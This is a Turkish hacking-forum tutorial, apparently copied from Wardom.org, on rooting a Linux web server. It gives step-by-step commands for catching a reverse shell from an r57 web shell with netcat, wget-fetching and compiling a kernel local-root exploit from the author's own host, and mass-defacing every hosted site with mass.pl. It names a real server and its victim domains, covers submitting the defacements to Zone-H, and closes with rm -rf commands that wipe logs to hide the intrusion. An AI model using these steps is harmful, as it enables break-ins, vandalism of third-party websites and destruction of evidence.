Arkadaşım root denilen olay oldukça zordur. Eğer r57 shell hakkında fazla bilgi sahibi değilsen okuma derim bu yazıyı. Çünkü kafanı karıştırabilir biraz
Root olmak ileri seviye biraz.
Bir serverda root olabilmen için servera r57 shell yedirmen, bu servera göre bir exploit bulman gerekir. Biraz da şans
Çünkü serverına göre exploit bulsan bile kesin root olabilecegimizi söyleyemeyiz..
Arşivimde root ile ilgili bir döküman var
Bu döküman linux server için...
Ancak baştan söyüyorum kafanı karıştırabilir biraz...
Ayrıca bu root konusunda en kısa zamanda bir video çekmeyi düşünüyorum...
----------------------------------------------------------------------
Gerekli olan malzemeler
-netcat
-shell (r57 önerilir)
-mass.pl
-zoneh.pl
-Bir adet index
Öncelikle netcat programının windows versiyonunu google dan bulup indirin ve "C"Klasörüne kopyalayın modeminizinde istediğiniz portunu açın forumda modeminizin nasıl portu açılacağını başka bir arkadaş anlatmıştı ondan dolayı anlatmıyorum
Netcat ve portumuzu ayarladık(ben:8888 portunu kullanacagım)
Başlat->çalıştır->cmd yazıp enterlıyoruz.Buraya nc -vv -l -p 8888 yazıyoruz ve alttaki resim karşımıza geliyor
Şimd, r57 attgımızı siteye gelip r57 sayfasının en alt kısmına geliyoruz ve resimki yeri buluyoruz
Burdaki 11457yi 8888 olarka değiştirip connecte tıklıyoruz ve bağlantıyı gerçekleştiriyoruz.
Şimdi aşağıdaki resimki gibi bağlandık
Burdada görüyoruzki serverımızın sürümü:
Linux nexus.arazel.com 2.6.9-34.EL #1 Wed Mar 8 00:07:35 CST 2006 i686 i686 i38
GNU/Linux
Şimdi buna uygun linux kernel local root exploit arayacagız.milw0rm.coma girip aratıyoruz ve karşımıza exploitler geliyor.
http://www.milw0rm.com/exploits/2005
İşte kullanacagımız, serverımıza uygun local root exploit.Ama bu .c dilinde.Bunu notepade kaydedip daha sonra uzantısını .c olarka değiştiriyoruz
Kaynak:
Wardom Linux Server Root "İleri Seviye Kullanıcılar İçin" - Wardom.Org
Evet üsttede göründüğü gibi ben 2.6.x.c olarak kaydettim.
Şimdi bunu serverımıza upload edelim ve derleyelim.
2.6.x.c yi ben
http://parkbulvar.net/2.6.x.c olarak kendi siteme upload ettim.
Şimdi wget komutu ile benim siteden bu exploiti server'a çekelim(üstteki resim)
wget
http://parkbulvar.net/2.6.x.c
eget saved dedi ve işlem tamam.Şimdi bu .c exploiti derleyeceğiz
üstteki resimde göründüğü gibi derleyelim.
Yani gcc -o root 2.6.x.c yapıyoruz.Şimdi exploitimiz derlendi ve root adını aldı.Bu root adlı derlenmiş exploite full yetki verelim;
chmod 777 root
Şimdi bu derlenmiş exploiti çalışıtralım
üstteki resimde exploitimizi çalıştırdık.Yani
./root -> exploiti çalıştırma
Daha sorna id yazarak serverdaki durumumuzu öğrenelim.
eger resimdeki gibi uid:0(root) yazıyorsa.Exploit işe yaradı, server rootlandı demektir.
Resimdede oldugu gibi serverı rootladık.
Şimdi tüm siteleri deface edeceğiz.
Serverdaki siteleri whois çekerek bakabiliriz
Whois'te 2 site gözüküyor.Napalım şansızlık
Eger whoiste domain adları yoksa ve serverdada belli değilse domain adları bakmanız gerekn yerler şuralardır.
/var/cpanel
/etc/httpd/conf/httpd.conf
etc/shadow
/var/named
Büyük ihtimalle burdaki yerlerden birinde domain adları mevcuttur.
Şimdi bizde control edelim
cd /var/named yazarak bu dizine geçiyoruz
ve ls yazarak bu dizindeki dosyaları listeliyoruz
İşte karşınızda domain isimleri.Sadece sonraki .db kısımlarını silmeniz yeterlidir.
arazel.com
brguild.com
brguild.org
clan-forsaken.com
danielhiggins.com
delucaspizzeria.com
dontknow.com
excessive-gaming.net
greyedge.com
houseforsaken.com
jeweladdict.com
keanpride.org
kindred192.com
mybox.mybox.com
named.ca
phosaigonexpress.com
webdetailing.com
Domainlerimiz üstte , şimdi bunu domain.txt olarak kaydediyoruz ve bir kenarda bekletiyoruz
Tüm siteleri deface etmek için mass.pl gereklidir. Ben size konuyla birlikte vereceğim.Şimdi mass.pl yi en başta r57.php attıgımız dizine upload ediyoruz.
perl mass.pl yazarak kullanımı karşımıza geliyor
example: perl mass.pl /tmp/index.html yazmış.
Bu şu demektir... /tmp/index.html -> burdaki indexi tüm klasörlere kopyala.
Burdaki /tmp dizini zorunlu değildir.Ben r57nin bulundugu dizini kullanacagım.
perl mass.pl /home/clanfo/domains/clan-forsaken.com/public_html/memberdb/admin/index.html
Resimdede oldugu gibi tüm siteler defacing ediliyor.
Bir kaç dakika sonra sitelerde indexini göreceksinizdir.
Şimdi sıra geldi zone-h almaya.zoneh.pl yi perl'inizin kurulu oldugu dizinde perl->bin-> buraya atıyorsunuz.
Şimdi başlat->çalıştır->cmd diyoruz ve burdan perl'in kurulu oldugunu dizinde perl->bin buraya geliyorsunuz.
Üst dizine çıkmak için cd.. , dizine girmek içi cd [dizin-adı] yapıcaksınız.
Kaynak:
Wardom Linux Server Root "İleri Seviye Kullanıcılar İçin" - Wardom.Org
Buraya gelince perl zoneh.pl diyince kullanımını görelim
kullanımı: perl zoneh.pl <liste adı.txt> <ad>
Yukarda serverdaki siteleri bir txt yapıp kaydetmiştik.Onu zoneh.pl nin oldugu dizine atıyoruz ve;
perl zoneh.pl domain.txt xoron
yazıp enterlıyoruz ve eklendiğine bakıyoruz
EVET İNDEXİMİ ATILMIŞ.
SİTELERİ İNDEXLERKEN KULLANDIGIMIZ MASS.PL LOGLARI SİLECEKTİR AMA SİZ GENEDE AŞAĞIDAKİ KODLARI KULLANARAK LOGLARINIZI SERVERDAN SİLİN
rm - rf /var/log
rm - rf /var/adm
find/- name .bash_logout - exec rm - rf {} \;
find/- name *.log - exec rm - rf {} \;
Alıntıdır...
------------------------------------------------------------------------------------------
